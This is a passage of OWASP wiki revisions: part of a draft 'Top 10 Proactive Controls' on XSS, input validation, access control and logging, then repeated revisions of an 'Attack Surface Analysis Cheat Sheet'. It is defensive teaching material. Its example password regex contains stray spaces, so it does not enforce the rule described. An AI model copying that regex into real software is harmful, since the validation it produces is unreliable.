Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection TODO JIMBIRD ==<br />
<br />
Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.<br />
<br />
Application logging should be always be included for security events. Application logs are invaluable data for:<br />
<br />
* Identifying security incidents<br />
* Monitoring policy violations<br />
* Establishing baselines<br />
* Providing information about problems and unusual conditions<br />
* Contributing additional application-specific data for incident investigation which is lacking in other log sources<br />
* Helping defend against vulnerability identification and exploitation through attack detection<br />
<br />
Application logging might also be used to record other types of events too such as:<br />
<br />
* Security events<br />
* Business process monitoring e.g. sales process abandonment, transactions, connections<br />
* Audit trails e.g. data addition, modification and deletion, data exports<br />
* Performance monitoring e.g. data load time, page timeouts<br />
* Compliance monitoring<br />
* Data for subsequent requests for information e.g. data subject access, freedom of information, litigation, police and other regulatory investigations<br />
* Legally sanctioned interception of data e.g application-layer wire-tapping<br />
* Other business-specific requirements<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little. Use knowledge of the intended purposes to guide what, when and how much.<br />
<br />
For more information, please see the [[Logging Cheat Sheet]].<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
TODO: Log Injection<br />
<br />
JIM BIRD: Talks about logging of “security events” but doesn’t explain or give examples of what a security event is. Reminder to obey privacy/confidentiality requirements – do not log private/confidential information Maybe should include something brief about protection from log injection (reminder to perform validation/encoding on user input fields that are logged)<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business logic abuse cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. Business logic requirements should also include failure scenarios (what happens if a step fails or if someone tries to repeat a step?) and requirements derived from "abuse-cases". These abuse cases would describe how the application's functions could be subverted by attackers. Thinking about failures and edge cases and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the system.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Designing secure software is a strategic effort where business, technical and security stakeholders agree on both the functional and non-functional security properties of software well before it is built. This is not an easy endeavor.<br />
<br />
JIM BIRD: Another important part of secure architecture and design is tiering and trust – deciding what is done in the UI, the web layer, the business layer, the data layer, and introducing trust zones/boundaries into this. What is inside/outside of a trust zone/boundary, what sources can be trusted, what cannot be. Attack Surface also comes into architecture/design. Creating an awareness of the system’s Attack Surface, trying to minimize it where possible, understanding when/how you are increasing it and understanding that this increases the risks of attack. For example, anonymous public access to the system, file uploads and interfaces to external systems are all potentially serious sources of security risk. Platform selection: language(s), O/S, web server, database or NOSQL data manager, etc. These architectural choices result in technology-specific security risks and constraints that the team needs to learn about and understand. Know your tools.<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=135379Attack Surface Analysis Cheat Sheet2012-09-05T17:41:17Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
= What is Attack Surface Analysis and Why is it Important? =<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (social engineering attacks for example), and there is less focus on insider threats.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis is usually done by security architects and pen testers. But developers should understand and monitor the Attack Surface as they design and build and change a system.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what functions and what parts of the system you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend<br />
# identify when you’ve changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding); and <br />
# all confidential and sensitive data used in the application, including secrets and keys, critical business data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can use the system. Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users. <br />
<br />
Group each type of attack point into buckets based on risk (Internet-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* UI forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* email or other kinds of messages<br />
* run-time arguments<br />
* ….?<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* ...<br />
<br />
You also need to identify the confidential and sensitive data in the application, by interviewing developers and users of the system and again by reviewing the source code. <br />
<br />
You can build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like the [[OWASP_Zed_Attack_Proxy_Project]] or [http://arachni-scanner.com/ Arachni] or [http://code.google.com/p/skipfish/ Skipfish] or [http://w3af.sourceforge.net/ w3af] or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. <br />
<br />
Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: signing up and creating a user profile, logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and [[Application Threat Modeling]]: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.<br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with crypto, authentication and session management<br />
<br />
This is where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls,and intrusion detection or prevention systems to help protect your app.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management and authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time OS. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF).<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=135378Attack Surface Analysis Cheat Sheet2012-09-05T17:34:44Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
= What is Attack Surface Analysis and Why is it Important? =<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (social engineering attacks for example), and there is less focus on insider threats.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what functions and what parts of the system you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend<br />
# identify when you’ve changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding); and <br />
# all confidential and sensitive data used in the application, including secrets and keys, critical business data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can use the system. Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users. <br />
<br />
Group each type of attack point into buckets based on risk (Internet-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* UI forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* email or other kinds of messages<br />
* run-time arguments<br />
* ….?<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* ...<br />
<br />
You also need to identify the confidential and sensitive data in the application, by interviewing developers and users of the system and again by reviewing the source code. <br />
<br />
You can build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like the [[OWASP_Zed_Attack_Proxy_Project]] or [http://arachni-scanner.com/ Arachni] or [http://code.google.com/p/skipfish/ Skipfish] or [http://w3af.sourceforge.net/ w3af] or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. <br />
<br />
Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and [[Application Threat Modeling]]: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.<br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with crypto, authentication and session management<br />
<br />
This is where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls,and intrusion detection or prevention systems to help protect your app.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management and authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time OS. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF).<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=135369Attack Surface Analysis Cheat Sheet2012-09-05T17:01:23Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
= What is Attack Surface Analysis and Why is it Important? =<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (social engineering attacks for example), and there is less focus on insider threats.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what functions and what parts of the system you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend<br />
# identify when you’ve changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding); and <br />
# all confidential and sensitive data used in the application, including secrets and keys, critical business data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can use the system. Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users. <br />
<br />
Group each type of attack point into buckets based on risk (Internet-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* UI forms and fields<br />
